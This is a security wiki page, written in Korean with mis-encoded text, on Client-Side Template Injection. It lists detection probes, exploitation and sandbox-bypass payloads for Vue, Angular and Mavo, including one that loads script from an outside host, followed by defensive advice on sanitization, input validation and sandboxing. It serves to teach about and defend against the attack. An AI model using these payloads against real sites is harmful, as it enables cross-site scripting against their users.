Back

Client-Side Template Injection (CSTI)

๐Ÿ” Introduction

CSTI(Client-Side Template Injection)์€ ๊ณต๊ฒฉ์ž๊ฐ€ Template ์ฝ”๋“œ๋ฅผ ๊ธฐ์กด template์— include ์‹œ์ผœ์„œ ์›ํ•˜๋Š” ์•ก์…˜์„ ์ˆ˜ํ–‰ํ•˜๋„๋ก ํ•˜๋Š” ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค. ์ด ๋•Œ template injection์ด ๋ฐœ์ƒํ•˜๋Š” ์œ„์น˜๊ฐ€ client-side์ธ ๊ฒฝ์šฐ CSTI๋ผ๊ณ  ๋ถ€๋ฆ…๋‹ˆ๋‹ค.

CSTI๋Š” Client-Side์—์„œ Javascript code๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, ์ด๋Š” XSS์™€ ๋™์ผํ•œ ๊ณต๊ฒฉ ๋ฒกํ„ฐ์™€ ๋ฆฌ์Šคํฌ๋ฅผ ๊ฐ€์ง€๋ฉฐ ์‚ฌ์‹ค์ƒ ๊ฑฐ์˜ ๊ฐ™์€ ๊ณต๊ฒฉ์ด๋ผ๊ณ  ๋ด๋„ ๋ฌด๋ฐฉํ•˜๊ธด ํ•ฉ๋‹ˆ๋‹ค. ๋‹ค๋งŒ CSTI์—์„œ๋งŒ ์˜ํ–ฅ์žˆ๋Š” ํŽ˜์ด๋กœ๋“œ๋“ค์ด ์žˆ์–ด ๋ณ„๋„๋กœ Cullinan ๋ฌธ์„œ๋กœ ์ •๋ฆฌํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

CSTI๋Š” SSTI์™€ ๋น„์Šทํ•˜๊ฒŒ Template Engine์ด ์„œ๋น„์Šค์— ๊ฐ™์ด ์กด์žฌํ•ด์•ผ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ์กฐ๊ฑด์ด ์ถฉ์กฑ๋ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ ์ด์•ผ๊ธฐํ•˜๋Š” Template Engine์€ ์ผ๋ฐ˜์ ์œผ๋กœ ์›น FE ๊ตฌ์„ฑ์—์„œ ๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” VueJS, AngularJS, React ๋“ฑ์„ ์˜๋ฏธํ•˜๋ฉฐ ์‚ฌ์šฉ์ž์˜ ์ž…๋ ฅ๊ฐ’์ด ๊ฐ ํ”„๋ ˆ์ž„์›Œํฌ์—์„œ ์‚ฌ์šฉํ•˜๋Š” Template ๋ฌธ๋ฒ•์— ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์žˆ์„ ๋•Œ CSTI ๊ณต๊ฒฉ์ด ์„ฑ๊ณตํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

SSTI์™€ ์œ ์‚ฌํ•˜๊ฒŒ Template ๋ฌธ๋ฒ• ๋‚ด ๊ฐ„๋‹จํ•œ ์ˆซ์ž ๊ณ„์‚ฐ์œผ๋กœ ํ†ตํ•ด์„œ ์˜ํ–ฅ๋ ฅ์„ ๊ฒ€์ฆํ•ฉ๋‹ˆ๋‹ค.

GET /test?q=abcd{{412*343}}efgh HTTP/1.1

๋ฏธ์ทจ์•ฝ

abcd${{412*343}}efgh

์ทจ์•ฝ

abcd141316efgh

Exploitation

Vue

<div v-html="alert(45)"> aaa</div>

Angular

<input ng-focus=$event.view.alert(45)>

Mavo

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Bypass protection

Vue

{{toString().constructor.constructor('alert(1)')()}}
return new Function(code)
{{_c.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
<x v-bind:is="'script'" src="//14.rs" />
<x is=script src=//โ‘ญ.โ‚จ>
<img src @error="e=$event.path;e[e.length-1].alert(1)">
<img src @error="e=$event.path.pop().alert(1)">
<img src @error="e=$event.composedPath().pop().alert(1)">
<img src @error=this.alert(1)>
{{-function(){this.alert(1)}()}}
<svg @load=this.alert(1)>
<svg@load=this.alert(1)>

Minimized

{{_c.constructor('alert(1)')()}}  // (32 bytes)
{{_b.constructor`alert(1)`()}}    // (30 bytes)

Angular

{{constructor.constructor('alert(1)')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

๐Ÿ›ก Defensive techniques

CSTI๋Š” ๋Œ€๋‹ค์ˆ˜ Injection ๊ณต๊ฒฉ๊ณผ ๋™์ผํ•˜๊ฒŒ Sanitization, Input validation์„ ์ด์ค‘์œผ๋กœ ์ ์šฉํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€์žฅ ์ข‹์€ ํ˜•ํƒœ์˜ ๋Œ€์‘๋ฐฉ์•ˆ์ด๊ณ  ์–ด๋ ค์šด ๊ฒฝ์šฐ ํ•œ๊ฐ€์ง€์˜ ๋Œ€์‘ ๋ฐฉ์•ˆ์„ ํƒํ•˜๊ฑฐ๋‚˜ Sandboxing์„ ๊ฒธํ•ด์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ํ˜•ํƒœ๋กœ ๋Œ€์‘์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

Sanitization

์‚ฌ์šฉ์ž ์ž…๋ ฅ์œผ๋กœ ๋ถ€ํ„ฐ Template์„ ์ƒ์„ฑํ•˜์ง€ ์•Š๋„๋ก ์ฒ˜๋ฆฌํ•ด์•ผํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด ํ•„์š”ํ•œ ๊ฒฝ์šฐ Template ์ž์ฒด์—์„œ ์ œ๊ณตํ•˜๋Š” Parameter๋ฅผ ํ†ตํ•ด ๋ฐ›์•„ ์ฒ˜๋ฆฌํ•˜๋„๋ก ๊ตฌ์„ฑํ•˜์—ฌ Template ์ž์ฒด์— ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์—†๋„๋ก ์ œํ•œํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

Input Validation

๋งˆ์ง€๋ง‰์œผ๋กœ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์—์„œ { } [ ] ๊ณผ ๊ฐ™์€ ํŠน์ˆ˜๋ฌธ์ž ์ž์ฒด๋ฅผ ๋ฐ›์ง€ ๋ชปํ•˜๋„๋ก Escape ์ฒ˜๋ฆฌํ•˜๋Š” ๋กœ์ง์„ ์ ์šฉํ•˜์—ฌ ๋Œ€์‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์ผ๋ถ€ XSS, SQLi์—์„œ ๋Œ€์‘ํ•˜๋Š” ๋ฐฉ์‹๊ณผ ๋™์ผํ•ฉ๋‹ˆ๋‹ค.

{ }
[ ]
< >
๋“ฑ XSS ๋Œ€์‘๋ฐฉ์•ˆ๊ณผ ์œ ์‚ฌํ•ฉ๋‹ˆ๋‹ค.

Sandboxing

์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’์„ ๊ธฐ๋ฐ˜์œผ๋กœ Template์„ ์ƒ์„ฑํ•˜๊ณ  ๋ Œ๋”๋งํ•ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ ์–ด์ฉ” ์ˆ˜ ์—†์ด ์‚ฌ์šฉ์ž ์ž…๋ ฅ์œผ๋กœ Template์„ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ๋ฐ–์— ์—†์Šต๋‹ˆ๋‹ค. ์ด ๋•Œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์œผ๋กœ ๋ถ€ํ„ฐ ๋ฐ›๋Š” Template์€ Sandboxing ํ•˜์—ฌ ๊ณต๊ฒฉ์ฝ”๋“œ๊ฐ€ ์‹ค์ œ๋กœ ์˜ํ–ฅ์„ ๋ผ์น  ์ˆ˜ ์—†๋„๋ก ์ œํ•œํ•˜๋Š” ๋ฐฉ๋ฒ•์œผ๋กœ๋„ ๋Œ€์‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‹ค๋งŒ Sandboxing์˜ ๊ฒฝ์šฐ ์šฐํšŒํ•  ์—ฌ์ง€๊ฐ€ ์ถฉ๋ถ„ํžˆ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ฐ€๊ธ‰์  ๋‹จ๋…์œผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ ๋ณด๋‹จ ์œ„ 2๊ฐœ์™€ ํ˜ผ์šฉํ•˜์—ฌ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์„ ์ถ”์ฒœ๋“œ๋ฆฝ๋‹ˆ๋‹ค.

๐Ÿ•น Tools

๐Ÿ“š Articles

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0